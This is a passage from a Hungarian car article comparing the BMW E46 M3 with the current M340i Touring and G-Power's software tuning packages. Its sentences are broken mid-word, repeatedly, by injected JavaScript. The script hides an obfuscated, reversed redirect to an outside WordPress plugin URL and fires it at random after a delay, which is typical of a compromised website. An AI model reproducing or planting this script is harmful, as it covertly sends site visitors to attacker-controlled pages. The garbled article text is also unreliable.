343 lóerőt tudott az E46-os BMW M3-as 3,2 literes szívó sorhatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja ezzel 5,2 másodperc alatt gyorsul 100-ra. Ezzel szemben az új BMW M340i-ből a nehezebb Touring váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozat 3,0 literes, sorhatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja már 374 lóerős és 500 Nm nyomatékú. Így pedig közel 1 másodpercet ver a 2000-es évek sportkupéjára sprintben. Innen azért nagyon jól látszik a 20 évnyi fejlődés, de a G-Power még tudta ezt fokozni. Hardveres beavatkozás nélkül megúszható a G-Power alapcsomagja, a GP-420. Ezzel a kis szoftveres módosítással az M340i 420 lóerős lesz és 600 Nm nyomaték szabadul fel a motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torból. 470 lóerőhöz és 650 Nm nyomatékhoz (GP-470) már szükséges…
- Hirdetés -